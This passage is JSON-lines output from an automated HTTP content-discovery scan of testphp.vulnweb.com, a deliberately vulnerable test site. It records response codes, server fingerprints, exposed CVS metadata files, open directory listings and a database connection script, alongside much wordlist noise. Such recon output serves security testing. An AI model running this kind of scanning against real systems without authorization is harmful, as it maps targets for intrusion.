Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/infotitle.php5H\",\"time\":\"343.134617ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.324470922Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/showxml.p\",\"input\":\"http://testphp.vulnweb.com/AJAX/showxml.p\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/showxml.p\",\"time\":\"342.840536ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.358119635Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/showxml.php\",\"input\":\"http://testphp.vulnweb.com/AJAX/showxml.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/showxml.php\",\"time\":\"344.284529ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":1,\"status_code\":200,\"content_length\":11,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.42193872Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/showxml.phpA01\",\"input\":\"http://testphp.vulnweb.com/AJAX/showxml.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/showxml.phpA01\",\"time\":\"356.752126ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.630289807Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/styles.css\",\"input\":\"http://testphp.vulnweb.com/AJAX/styles.css\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/css\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/styles.css\",\"time\":\"361.889465ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":41,\"lines\":36,\"status_code\":200,\"content_length\":562,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.676238791Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/AJAX/titles.phpA01\",\"input\":\"http://testphp.vulnweb.com/AJAX/titles.phpA01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/AJAX/titles.phpA01\",\"time\":\"342.710112ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.690403419Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Accept:\",\"input\":\"http://testphp.vulnweb.com/Accept:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Accept:\",\"time\":\"352.254476ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.734694567Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Attack\",\"input\":\"http://testphp.vulnweb.com/Attack\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Attack\",\"time\":\"348.876666ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:47.908823692Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Biolinky.co/agenxionplay\",\"input\":\"http://testphp.vulnweb.com/Biolinky.co/agenxionplay\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Biolinky.co/agenxionplay\",\"time\":\"350.876879ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:51.197484357Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/\",\"input\":\"http://testphp.vulnweb.com/CVS/\",\"title\":\"Index of /CVS/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/\",\"time\":\"351.729291ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":262,\"lines\":11,\"status_code\":200,\"content_length\":595,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:51.297564076Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/)\",\"input\":\"http://testphp.vulnweb.com/CVS/)\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/)\",\"time\":\"341.746263ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:51.371023039Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/1\",\"input\":\"http://testphp.vulnweb.com/CVS/1\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/1\",\"time\":\"350.891084ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:51.401145256Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/1L\",\"input\":\"http://testphp.vulnweb.com/CVS/1L\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/1L\",\"time\":\"356.174081ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:52.143562393Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries\",\"input\":\"http://testphp.vulnweb.com/CVS/Entries\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Entries\",\"time\":\"342.145938ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:52.144425178Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/A01\",\"input\":\"http://testphp.vulnweb.com/CVS/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/A01\",\"time\":\"352.481405ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:52.159656288Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"input\":\"http://testphp.vulnweb.com/CVS/Entries.Log\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Entries.Log\",\"time\":\"357.657868ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:52.167294938Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/Repository\",\"input\":\"http://testphp.vulnweb.com/CVS/Repository\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Repository\",\"time\":\"348.275545ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":1,\"lines\":2,\"status_code\":200,\"content_length\":8,\"failed\":false,\"knowledgebase\":{\"PageType\":\"nonerror\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:52.880741534Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/CVS/Root\",\"input\":\"http://testphp.vulnweb.com/CVS/Root\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"application/octet-stream\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/CVS/Root\",\"time\":\"343.888747ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":2,\"lines\":1,\"status_code\":200,\"content_length\":1,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:56.108627644Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Cenzic\",\"input\":\"http://testphp.vulnweb.com/Cenzic\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Cenzic\",\"time\":\"356.750825ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:56.115459268Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Connection:\",\"input\":\"http://testphp.vulnweb.com/Connection:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Connection:\",\"time\":\"352.384202ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:56.390941883Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Connections/\",\"input\":\"http://testphp.vulnweb.com/Connections/\",\"title\":\"Index of /Connections/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Connections/\",\"time\":\"347.964373ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":59,\"lines\":8,\"status_code\":200,\"content_length\":281,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.117612685Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Connections/DB_Connection.php\",\"input\":\"http://testphp.vulnweb.com/Connections/DB_Connection.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Connections/DB_Connection.php\",\"time\":\"348.656782ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":23,\"lines\":5,\"status_code\":200,\"content_length\":236,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.145484265Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Content-Length:\",\"input\":\"http://testphp.vulnweb.com/Content-Length:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Content-Length:\",\"time\":\"347.212383ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.15670482Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Content-Type:\",\"input\":\"http://testphp.vulnweb.com/Content-Type:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Content-Type:\",\"time\":\"357.871844ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.205745647Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Cookie:\",\"input\":\"http://testphp.vulnweb.com/Cookie:\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Cookie:\",\"time\":\"342.319062ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.234238195Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ\",\"input\":\"http://testphp.vulnweb.com/FUZZ\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ\",\"time\":\"356.569982ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.249089835Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ\\\"\",\"input\":\"http://testphp.vulnweb.com/FUZZ%22\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ%22\",\"time\":\"342.086168ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.344671911Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ•\",\"input\":\"http://testphp.vulnweb.com/FUZZ%E2%80%A2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ%E2%80%A2\",\"time\":\"348.519286ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.500169759Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ********************************************************\",\"input\":\"http://testphp.vulnweb.com/FUZZ********************************************************\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ********************************************************\",\"time\":\"346.244248ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.572997038Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ*********************************************************\",\"input\":\"http://testphp.vulnweb.com/FUZZ*********************************************************\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ*********************************************************\",\"time\":\"351.488992ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.653566118Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ.php\",\"input\":\"http://testphp.vulnweb.com/FUZZ.php\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ.php\",\"time\":\"348.173543ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":3,\"lines\":2,\"status_code\":404,\"content_length\":16,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.667874319Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ/FUZ2Z\",\"input\":\"http://testphp.vulnweb.com/FUZZ/FUZ2Z\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ/FUZ2Z\",\"time\":\"339.776733ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.72384924Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZ/FUZ2ZFUZ3Z\",\"input\":\"http://testphp.vulnweb.com/FUZZ/FUZ2ZFUZ3Z\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZ/FUZ2ZFUZ3Z\",\"time\":\"360.519278ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.780436009Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZCrunch\",\"input\":\"http://testphp.vulnweb.com/FUZZCrunch\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZCrunch\",\"time\":\"356.934145ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:57.977395751Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZEach\",\"input\":\"http://testphp.vulnweb.com/FUZZEach\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZEach\",\"time\":\"342.890534ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:58.029941116Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZLines\",\"input\":\"http://testphp.vulnweb.com/FUZZLines\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZLines\",\"time\":\"352.007832ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:58.045707326Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZMultiple\",\"input\":\"http://testphp.vulnweb.com/FUZZMultiple\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZMultiple\",\"time\":\"351.186597ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:58.076737499Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZThe\",\"input\":\"http://testphp.vulnweb.com/FUZZThe\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZThe\",\"time\":\"339.184944ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:21:58.264595327Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZTotal\",\"input\":\"http://testphp.vulnweb.com/FUZZTotal\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZTotal\",\"time\":\"352.387118ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:01.543823705Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/FUZZWhen\",\"input\":\"http://testphp.vulnweb.com/FUZZWhen\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/FUZZWhen\",\"time\":\"343.818236ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:01.644809294Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/\",\"input\":\"http://testphp.vulnweb.com/Flash/\",\"title\":\"Index of /Flash/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/\",\"time\":\"344.310071ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":127,\"lines\":9,\"status_code\":200,\"content_length\":371,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:01.721989994Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/2\",\"input\":\"http://testphp.vulnweb.com/Flash/2\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/2\",\"time\":\"346.662715ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:01.75287996Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/A01\",\"input\":\"http://testphp.vulnweb.com/Flash/A01\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/A01\",\"time\":\"348.227192ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":5,\"lines\":8,\"status_code\":404,\"content_length\":153,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:02.505001965Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/add.fla\",\"input\":\"http://testphp.vulnweb.com/Flash/add.%EF%AC%82a\",\"title\":\"404 Not Found\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/Flash/add.%EF%AC%82a\",\"time\":\"355.239042ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\"],\"words\":71,\"lines\":14,\"status_code\":404,\"content_length\":555,\"failed\":false,\"knowledgebase\":{\"PageType\":\"error\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:22:02.505126171Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/Flash/add.flaA01\",\"input\":\"http://testphp.vulnweb.com/Flash/add.%EF%AC%82aA01\",\"title\":\"404 Not 